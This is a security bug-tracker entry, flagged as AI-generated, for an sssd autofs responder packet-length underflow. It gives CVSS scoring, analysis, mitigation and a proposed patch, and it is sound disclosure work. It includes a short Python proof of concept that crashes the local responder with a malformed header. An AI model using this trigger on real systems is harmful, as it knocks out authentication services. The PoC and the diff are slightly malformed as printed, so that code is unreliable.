Bug 2479030 (CVE-2026-104037) - CVE-2026-104037 sssd: sssd: Denial of Service via packet length underflow in autofs responder
Summary: CVE-2026-104037 sssd: sssd: Denial of Service via packet length underflow in ...
Keywords:
Status: NEW
Alias: CVE-2026-104037
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On: 2546245
Blocks:
TreeView+ depends on / blocked
 
Reported: 2026-05-18 03:53 UTC by OSIDB Bzimport
Modified: 2026-10-06 00:15 UTC (History)
18 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2026-05-18 03:53:10 UTC
AI_ONLY_REPORT
package: sssd-2.12.0-1.el10
------
Summary: Local DoS in autofs responder via packet length underflow in  
`autofs_read_setautomntent_input`: crafted local `SSS_AUTOFS_SETAUTOMNTENT`  
requests with a declared packet length below the 16-byte header can  
underflow `blen` and trigger invalid reads that crash or destabilize the  
autofs responder.
Requirements to exploit: A local attacker must be able to connect to the  
autofs responder UNIX socket and send a malformed  
`SSS_AUTOFS_SETAUTOMNTENT` request whose declared packet length is smaller  
than `SSS_NSS_HEADER_SIZE`. Deployments where the autofs responder is  
disabled or its socket is not reachable to the attacker are not exposed  
through this path.
Component affected: `sssd-2.12.0-1.el10`, autofs responder request parsing  
in `src/responder/autofs/autofssrv_cmd.c`  
(`autofs_read_setautomntent_input()`), with related packet length handling  
in `src/responder/common/responder_packet.c`
Version affected: `sssd-2.12.0-1.el10` when the autofs responder is enabled  
and reachable through its local UNIX socket
Patch available: no released package fix established; proposed patch  
included below
Version fixed: unknown
Upstream coordination: Not notified.
CVSS: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - 6.1 (MEDIUM)
AV:L - Exploitation is local through the autofs responder UNIX socket.
AC:L - The trigger is a single malformed request with a declared length  
smaller than the 16-byte header.
PR:N - No privileges within the vulnerable component are required beyond  
being able to open the local responder socket.
UI:N - No user interaction is needed.
S:U - The impact is limited to the same responder process and security  
scope.
C:N - No confidentiality impact is established.
I:N - No integrity impact is established.
A:H - Crafted input can terminate or destabilize the autofs responder,  
causing loss of that service.
Impact: Moderate. The available evidence supports a locally reachable  
denial of service against the autofs responder, but not privilege  
escalation, confidentiality loss, or integrity compromise. Because the  
issue is local and exposure depends on the autofs responder being enabled  
and reachable, this fits Red Hat's Moderate rating more closely than  
Important.
Embargo: no
Reason: This is a local, service-scoped denial of service with no  
demonstrated confidentiality or integrity impact, and there is  
straightforward mitigation by disabling or restricting the affected  
responder until a fix is available.
Acknowledgement: Aisle Research
Vulnerability Details: In `autofs_read_setautomntent_input()`, the request  
body is used without first ensuring that the computed body length is  
non-zero and derived from a valid packet length:
```c
sss_packet_get_body(pctx->creq->in, &body, &blen);
/* if not terminated fail */
if (body[blen - 1] != '\0') {
return EINVAL;
}
/* If the body isn't valid UTF-8, fail */
if (!sss_utf8_check(body, blen - 1)) {
return EINVAL;
}
```
Here, `blen` is derived as the declared packet length minus  
`SSS_NSS_HEADER_SIZE`, and the receive path does not reject declared  
lengths smaller than `SSS_NSS_HEADER_SIZE` before dispatch. If an attacker  
supplies a packet whose declared length is less than `16` bytes, `blen`  
wraps to a very large `size_t`. Subsequent use of `body[blen - 1]` and  
`sss_utf8_check(body, blen - 1)` can then read outside the actual packet  
buffer and may crash or destabilize the responder. A declared length of  
exactly `16` produces `blen == 0`; that case still underflows the UTF-8  
length argument, but the clearer crash-prone case is a declared length  
below `16`.
Steps to reproduce:
1. Ensure the autofs responder is enabled and its socket is present,  
typically `/var/lib/sss/pipes/autofs`.
2. Send a crafted 16-byte header whose declared packet length field is `15`  
and whose command is `0x00D1` (`SSS_AUTOFS_SETAUTOMNTENT`).
3. Run:
```bash
python3 - <<'PY'
import socket, struct
sock = "/var/lib/sss/pipes/autofs"
len=15 (<16), cmd=0x00D1, status=0, reserved=0
pkt = struct.pack("<IIII", 15, 0x00D1, 0, 0)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(sock)
s.sendall(pkt)
print("sent")
PY
```


4. Observe responder instability or crash, or an invalid read when tested  
with ASan/UBSan. The exact manifestation may vary by build and runtime  
environment.
Mitigation: If autofs integration is not required, disable the autofs  
responder. Otherwise, restrict access to the autofs responder UNIX socket  
to trusted local users until a fixed package is available.
Proposed Fix: Reject undersized packets in the common receive path and  
reject zero-length autofs request bodies before subtracting `1` from `blen`.
```diff
diff --git a/src/responder/common/responder_packet.c  
b/src/responder/common/responder_packet.c
— a/src/responder/common/responder_packet.c
+++ b/src/responder/common/responder_packet.c
@@ -217,6 +217,10 @@ int sss_packet_recv(struct sss_packet *packet, int fd)
new_len = sss_packet_get_len(packet);
+    if (new_len < SSS_NSS_HEADER_SIZE) {
+        return EINVAL;
+    }
+
if (new_len > packet->memsize) {
enum sss_cli_command cmd = sss_packet_get_cmd(packet);
size_t max_recv_size;
diff --git a/src/responder/autofs/autofssrv_cmd.c  
b/src/responder/autofs/autofssrv_cmd.c
— a/src/responder/autofs/autofssrv_cmd.c
+++ b/src/responder/autofs/autofssrv_cmd.c
@@ -386,7 +386,7 @@ autofs_read_setautomntent_input(struct cli_ctx *cli_ctx,
sss_packet_get_body(pctx->creq->in, &body, &blen);
/* if not terminated fail */
   if (body[blen - 1] != '\0') {
+    if (blen == 0 || body[blen - 1] != '\0') {
          return EINVAL;
      }
```


------
This report was generated using AI technology. Always review AI-generated  
content prior to use


Note You need to log in before you can comment on or make changes to this bug.